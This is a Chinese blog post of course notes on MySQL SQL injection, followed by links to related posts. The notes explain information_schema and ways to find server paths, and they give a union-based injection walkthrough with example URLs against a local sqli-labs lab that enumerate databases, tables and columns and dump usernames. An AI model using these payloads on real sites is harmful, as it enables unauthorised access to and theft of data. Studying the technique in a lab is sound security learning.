SQL注入之MYSQL注入

最新推荐文章于 2024-06-26 20:37:47 发布
最新推荐文章于 2024-06-26 20:37:47 发布
阅读量334 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: mysql sql 数据库 web安全
原文链接:https://www.bilibili.com/video/BV1JZ4y1c7ro
版权

information_schema

MYSQL5.0以上版本中,再带一个名为information_schema的数据库,这个数据库存储这所有数据库名,表名和列名,可通过此数据库查询指定数据库下的表明和列名。

mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_LOCKS                          |
| INNODB_TRX                            |
| INNODB_SYS_DATAFILES                  |
| INNODB_FT_CONFIG                      |
| INNODB_SYS_VIRTUAL                    |
| INNODB_CMP                            |
| INNODB_FT_BEING_DELETED               |
| INNODB_CMP_RESET                      |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMPMEM_RESET                   |
| INNODB_FT_DELETED                     |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_LOCK_WAITS                     |
| INNODB_TEMP_TABLE_INFO                |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_FIELDS                     |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_BUFFER_PAGE                    |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_SYS_TABLESPACES                |
| INNODB_METRICS                        |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_CMPMEM                         |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_TABLESTATS                 |
+---------------------------------------+
61 rows in set (0.00 sec)

information_schema.schemata:记录所有数据库名的表

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_schema:列名

低版本注入

目前5.0以下版本的mysql很少见,一般只能通过字典暴力破解少数可通过文件读取收集路径信息

文件读写操作

路径获取方法

  • 报错显示
  • 遗留文件:调试网站时所遗留的信息文件,如phpinfo()等,会泄露路径,可用工具扫描到。
  • 漏洞报错:知道对方用什么程序搭建的网站,网上搜索相关爆路径漏洞
  • 平台配置文件:通过读取文件来读取搭建平台配置文件。缺点:路径不默认,一旦更改很难找到。

常见读取文件列表

常见的load_file()读取的敏感信息_weixin_30292843的博客-CSDN博客

常用函数

  • version():数据库的版本(注意5.0版本前后的区别)
  • user():当前操作数据库的用户
  • database():当前数据库名

  • @@version_compile_os:服务器的操作系统

运算符优先级问题

 MySQL运算符的优先级

注入流程及跨库注入

  1. 判断是否存在注入点
  2. 查询当前数据表有多少列
    order by x(对前面数据进行排列,有几列就x就是几,超过列数就会报错)
  3. 信息收集(查看当前数据库版本,数据库名称),注意让union前语句为空,这样后面的语句就可以显示出来
    http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select group_concat(schema _name) from information_schema.schemata
    注意:union 前后的两个 sql 语句的选择列数要相同
  4. 查表
    http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select group_concat(table_name) from information _schema.tables where table_schema='xxxxx'
  5. 查列
    http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select group_concat(column _name) from information_schema.columns where table_name='xxx'

  6. 查字段
    http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select group_concat(username) from column_name
    跨库注入:MySQL数据库sql注入之数据获取、跨库注入以及文件读写(以sqli-labs环境演示) - shley - 博客园

注:文章是对于小迪师傅安全课程的学习总结,【小迪安全】web安全|渗透测试|网络安全(6个月线上培训全套)_哔哩哔哩_bilibili,部分内容参考自【小迪安全-web渗透测试课程】第12天:WEB漏洞-SQL注入之简要SQL注入 - 哔哩哔哩

这是小刘
关注
专栏目录
MySQL SQL 注入
小小博客爱分享
07-29 205
本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL注入的字符。 SQL注入可能是目前互联网上存在的最丰富的编程缺陷。 这是未经授权的人可以访问各种关键和私人数据的漏洞。 SQL注入不是Web数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 它是从远程位置执行的最致命和最容易的攻击之一。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到
sql注入-mysql注入
qq_38849692的博客
08-03 199
sql常用的注入语句 查询数据库----假设为 security select database(); 查询数据库中的表 select group_concat(table_name) from information_schema.tables where table_schema=database(); 查询表中的字段名(security.users表中的列) select group_concat(column_name) from information_schema.columns wh
SQL注入Mysql注入
qq_27862405的博客
05-24 982
必要知识点: 在Mysql5.0以上版本中,mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。 数据库中符号“.”代表下一级,如adb.user表示adb数据库下的user表名 Information_schema.tables:记录所有表名信息的表 Information_schema.columns:记录所有列名信息的表 Information_schema.sch
从0到1,SQL注入sql十大注入类型)收藏这一篇就够了,技术解析与实战演练
最新发布
黑战士的博客
06-26 1530
SQL 注入是比较常见的网络攻击方式之一,它不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至篡改数据库。由于以下的环境都是 MySQL 数据库,所以先了解点 MySQL 有关的知识。在 MySQL5.0 之后,MySQL 中默认添加了一个名为的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。mysql中注释符:# 、/**/ 、 --
sql注入(mysql)
m0_73452266的博客
04-20 563
sql注入基础
MySQLSQL注入
yimtcode
08-14 184
MySQLSQL注入 1.简介 通过对数据库外部接口输入恶意内容,影响数据库select的查询结果。 2.准备 # 演示用户表 create table user ( id int unsigned primary key, username varchar(20) not null, password varchar(20) not null ); # 演示数据 insert into user values (1, 'yimt', '1234'); 3.SQL
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1353
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
MySQLSQL 注入
12-16
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL注入的字符。 所谓SQL注入,就是通过把SQL命令插入到...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
PHP+MysqlSQL注入源码 下载
01-01
这个"PHP+MysqlSQL注入源码 下载"的主题涉及到一个常见的安全问题——SQL注入,以及如何处理和预防这种情况。下面将详细讨论SQL注入、PHP与MySQL的结合使用,以及如何防范SQL注入。 **SQL注入** SQL注入是一种...
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入SQL Server注入MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
sql注入-MySQL
2202_75361164的博客
04-07 1211
盲注点确认后,我们一般不会去手动尝试一个字节一个字节的跑出来,而是采用工具比如sqlmap或者一些脚本来辅助我们,毕竟是属于重复无意义的工工作,交给机器就好了语句和之前其他查询都是类似,唯一的区别,就是盲注变成了一位字符一位字符的判断,不像之前那样一次性全部获取数据。
SQL注入MySQL
weixin_44508748的博客
05-06 213
一、union联合查询 1.判断注入漏洞 2.判断字段数目 order by x 3.union联合查询,爆字符列位置 union select 1,2,3,4,5 4.在字符列上查询相关数据库信息 union select 1,version(),database(),4,5 # 获取数据库信息,其他: union select distinct table_schema from info...
MySql(四)SQL注入
爱是与世界平行
03-06 751
MySql(四)SQL注入一、SQL注入简介二、应用开发中可以采取的应对措施2.1 PrepartStatement+Bind-Variable2.2 使用应用程序提供的转换函数2.3 自定义函数进行校验 一、SQL注入简介 结构化查询语言( SQL)是一种用来和数据库交互的文本语言。SQL注入( SQL Injection )就是利用某些数据库的外部接口将用户数据插入到实际的数据库操作语言(SQ...
mysql sql注入
技术的搬运工
05-05 398
通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 举例 1:输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间: if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)) { $result = mysqli_que...
MySQL SQL注入
冷月醉雪的博客
01-11 3428
防止SQL注入,我们需要注意以下几个要点: ·1.永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双"-"进行转换等。 ·2.永远不要使用动态拼装sql,可以使用参数化的sql或直接使用存储过程进行数据查询存取。 ·3.永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。 ·4.不要把机密信息直接存放,加密或hash掉密码和...
mysql-sql注入
qq_37660792的博客
03-26 97
mysql不存在共享池概念,使用绑定变量避免sql注入,增加安全性。 php5开始mysqli扩展支持PrepareStatement.建议使用PrepareStatement+Bind-variable实现。 $stmt = $dbh -> prepare("select * from users where username=? and password=?"); $stmt ->...
CTFhub-SQL注入
Moyv的博客
01-27 4452
CTFhub-SQL注入
理解MySQL SQL注入攻击与防范
"这篇文档详细介绍了基于MySQLSQL注入攻击,包括其概念、危害、以及如何进行防御。" SQL注入是一种常见的网络安全攻击方式,主要针对使用SQL语言的数据库系统,如MySQL。攻击者通过在Web表单中输入恶意的SQL代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值